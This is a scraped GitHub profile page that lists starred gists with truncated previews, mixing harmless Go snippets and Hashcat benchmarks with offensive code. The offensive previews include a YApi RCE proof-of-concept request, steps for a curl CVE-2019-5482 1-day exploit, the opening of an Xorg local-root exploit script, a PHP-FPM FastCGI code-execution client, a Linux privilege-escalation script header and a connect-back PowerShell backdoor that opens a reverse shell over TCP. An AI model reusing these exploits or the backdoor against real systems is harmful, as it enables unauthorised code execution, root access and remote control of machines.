Skip to content

Instantly share code, notes, and snippets.

View akamajoris's full-sized avatar
💭
Life

Canis Majoris akamajoris

💭
Life
View GitHub Profile
@pikpikcu
pikpikcu / YApi-RCE.md
Last active July 16, 2021 22:12
YApi-RCE

POC YApi RCE:

Reference:

POC

Requests:

POST /api/user/reg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
@PaulCher
PaulCher / _readme.md
Last active July 23, 2023 15:01
curl 1-day exploit
  1. Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
  2. Update ip addresses at the source files
  3. Launch srv.py on the server
  4. Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
@balacode
balacode / permute_strings.go
Last active May 19, 2022 12:29
PermuteStrings() - fn to generate a string array of all combinations of input string slices, maintaining order
// -----------------------------------------------------------------------------
// (c) balarabe@protonmail.com License: MIT
// :v: 2018-03-18 23:55:24 [permute_strings.go]
// -----------------------------------------------------------------------------
package main
import "bytes" // standard
import "fmt" // standard
import "testing" // standard
@phith0n
phith0n / fpm.py
Last active June 7, 2024 13:02
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False

Nvidia GTX 1080 Ti Hashcat Benchmarks

Software: Hashcat v3.40-49-g20057d8, Nvidia driver 378.13

Accelerator: 1x Nvidia GTX 1080 Ti FE

Highlights

  1. This card is clock-for-clock identical to the Titan X Pascal, so the numbers should not be new or surprising to anyone.
@epixoip
epixoip / 8x1080.md
Last active March 20, 2024 17:14
8x Nvidia GTX 1080 Hashcat Benchmarks
@ammario
ammario / ipint.go
Last active May 25, 2024 21:43
Golang IP <-> int conversion
func ip2int(ip net.IP) uint32 {
if len(ip) == 16 {
return binary.BigEndian.Uint32(ip[12:16])
}
return binary.BigEndian.Uint32(ip)
}
func int2ip(nn uint32) net.IP {
ip := make(net.IP, 4)
binary.BigEndian.PutUint32(ip, nn)
@1N3
1N3 / LinuxPrivEsc.sh
Created May 13, 2016 02:50
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
@inaz2
inaz2 / psbackdoor.ps1
Last active October 13, 2021 17:22
connect-back PowerShell backdoor
$addr = "localhost"
$port = 4444
$client = New-Object System.Net.Sockets.TcpClient ($addr, $port)
$stream = $client.GetStream()
$buffer = New-Object System.Byte[] $client.ReceiveBufferSize
$enc = New-Object System.Text.AsciiEncoding
try {
while ($TRUE) {